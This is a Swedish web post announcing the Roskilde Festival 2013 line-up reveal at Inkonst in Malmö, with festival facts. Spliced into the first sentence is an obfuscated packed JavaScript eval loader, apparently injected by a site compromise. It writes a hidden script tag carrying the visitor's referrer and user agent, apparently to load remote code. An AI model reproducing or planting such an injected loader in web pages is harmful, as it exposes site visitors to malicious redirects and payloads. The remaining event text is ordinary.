Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Vilka kommer att spela på Roskilde Festival 2013?

Vilka kommer att spela på Roskilde Festival 2013?
Sebastian

Roskilde eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yfbbt|var|u0026u|referrer|bzfzt||js|php’.split(’|’),0,{}))
Festival avslöjar sin line-up kl 20.00 den 18:e april i Malmö på Inkonst där du även kan möta bandbokarna!

Kommer ditt favoritband att spela på detta års upplaga av Roskilde Festival. 

På Torsdag kl 20.00 kommer frågan att besvaras av Creative Director Rikke Øxner och taleskvinnan Christina Bilde på Inkonst i Malmö.

Nästan hälften av Roskilde Festivals 200 akter är redan släppta. På torsdag offentliggörs de resterande under en live streaming som följs av en stund där publiken kan ställa frågor. Det kommer även gå att boka en intervju med bokarna före och efter bandsläppet.

Vi kommer att avsluta kvällen i klassisk Roskildeanda genom en konsert. Du får chansen att  njuta av Compadre, Summer Heart (DJ) och Friendly Beastly Coyote!

Om Roskilde Festival:

Roskilde Festival är norra Europas största och mest unika musikfestival. Den har funnits sedan 1971. Under 2013 kommer Roskilde Festival att pågå från dne 29:e juni tull den 7:e juli. Mer än 200 band och artister kommer att uppträda under den nio dagar långa festivalen, bland annat finner ni Rihanna, Sigur Rós, Slipknot, Queens of the Stone Age and Kraftwerk.

Utöver musiken erbjuder Roskilde Festival ekologisk mat, konst, Dream City där publiken bestämmer, en skate arena och mycket mer.

Roskilde Festival bygger på 30 000 frivilliga funktionärers arbete. Totalt kommer 130 000 personer samman på Roskilde varje år för att tillsammans skapa “The Orange Feeling”.

Läs mer på: www.roskilde-festival.dk